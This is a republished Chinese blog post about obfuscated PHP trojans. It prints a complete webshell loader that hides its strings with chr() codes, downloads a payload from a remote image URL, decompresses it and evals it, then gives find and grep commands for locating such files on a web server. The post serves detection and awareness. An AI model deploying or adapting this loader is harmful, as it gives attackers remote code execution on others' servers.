博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
php木马问题
阅读量:6533 次
发布时间:2019-06-24

本文共 1106 字,大约阅读时间需要 3 分钟。

  hot3.png

如今许多木马 已经不是明文 能够搜索到的关键字,很多是加密的,还有把字符编码的,如下面:

 

<?php

$password='pk10';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>

 

 

find /www/web/si -name "*.php" -ctime +1

grep -color -i -r -n "'PhpCode'" /www/web/si

grep -color -i -r -n "$c(104)" /www/web/si

转载于:https://my.oschina.net/mellen/blog/1608847

你可能感兴趣的文章
C# CancellationTokenSource和CancellationToken的实现
查看>>
.Net IOC框架入门之一 Unity
查看>>
PCIE BAR空间
查看>>
winform命名规范
查看>>
如何用数学课件制作工具画角平分线
查看>>
Linux chmod命令及权限含义
查看>>
jrtplib编译指南
查看>>
VS2015 中统计整个项目的代码行数
查看>>
Anaconda入门使用指南
查看>>
UWP控件与DataBind
查看>>
bash: php: command not found
查看>>
XVIII Open Cup named after E.V. Pankratiev. Eastern Grand Prix
查看>>
数据恢复软件如何换机使用?
查看>>
python:unittest之跳过测试和预期失败的用例
查看>>
c# 修改xml格式config文件
查看>>
Java虚拟机详解03----常用JVM配置参数
查看>>
ORA-38301:can not perform DDL/DML Over Object in Recycle Bin 11.2.0.4
查看>>
IBM WebSphere MQ介绍安装以及配置服务详解
查看>>
关于Solr的使用总结的心得体会
查看>>
C# 类相同属性赋值
查看>>